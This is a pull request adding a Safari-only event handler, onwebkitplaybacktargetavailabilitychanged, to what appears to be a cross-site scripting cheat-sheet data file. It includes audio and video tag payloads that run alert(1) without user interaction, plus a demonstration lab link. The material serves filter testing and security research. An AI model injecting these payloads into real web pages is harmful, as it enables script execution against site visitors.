### PR TITLE
Add onwebkitplaybacktargetavailabilitychanged event - no user interaction

### DIFF
--- a/json/events.json
+++ b/json/events.json
@@ -9477,5 +9477,26 @@
                 "interaction": true
             }
         ]
+    },
+    "onwebkitplaybacktargetavailabilitychanged": {
+        "description": "Fires when the availability of an AirPlay playback target changes",
+	"tags": [
+            {
+                "tag": "audio",
+                "code": "<audio onwebkitplaybacktargetavailabilitychanged=alert(1)>",
+                "browsers": [
+                    "safari"
+                ],
+                "interaction": false
+	    },
+            {
+                "tag": "video",
+                "code": "<video onwebkitplaybacktargetavailabilitychanged=alert(1)>",
+                "browsers": [
+                    "safari"
+                ],
+                "interaction": false
+	    }
+	]
     }
 }


### PR DESCRIPTION
For a quick demonstration, use https://portswigger-labs.net/xss/xss.php?x=%3Caudio%20onwebkitplaybacktargetavailabilitychanged=alert(1)%3E&context=html

Crediting this information to me would make me happy :) Connect with me on Twitter: @AmirMSafari